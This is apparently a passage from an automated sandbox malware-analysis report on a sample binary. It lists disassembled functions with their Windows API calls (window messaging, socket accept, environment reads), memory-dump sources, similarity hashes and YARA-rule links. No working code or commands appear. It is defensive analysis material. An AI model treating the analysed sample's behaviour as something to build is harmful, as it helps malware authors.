                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                            • API String ID: 3850814276-3896280584
                                                                                                                                                                                                                                                            • Opcode ID: 9e010991f0c4b9109715b632163dccb7fe982870f61429f5b7380d262220bbc2
                                                                                                                                                                                                                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e010991f0c4b9109715b632163dccb7fe982870f61429f5b7380d262220bbc2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                                                                                                                                            Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00448C69
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                                                                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                                                                                                                                                                            Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                                                                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 385091864-0
                                                                                                                                                                                                                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                                                                                                                                                                            Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                                                                                                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                                                                                                                                                                            Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1358664141-0
                                                                                                                                                                                                                                                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                                                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                                                                                                                                            Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                                                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                                                                                                                                            Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                                                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                                                                                                                                            Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1187119602-0
                                                                                                                                                                                                                                                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                                                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                                                                                                                                            Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1597257046-0
                                                                                                                                                                                                                                                            • Opcode ID: 0730b6623b1383e20fe13541dc72d1ba8975e1512efcb7382885d51de004be2c
                                                                                                                                                                                                                                                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0730b6623b1383e20fe13541dc72d1ba8975e1512efcb7382885d51de004be2c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                                                                                                                                                            Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                                                                                                                                            • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 237123855-0
                                                                                                                                                                                                                                                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                                                                                                                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                                                                                                                                                            Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3349847261-0
                                                                                                                                                                                                                                                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                                                                                                                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
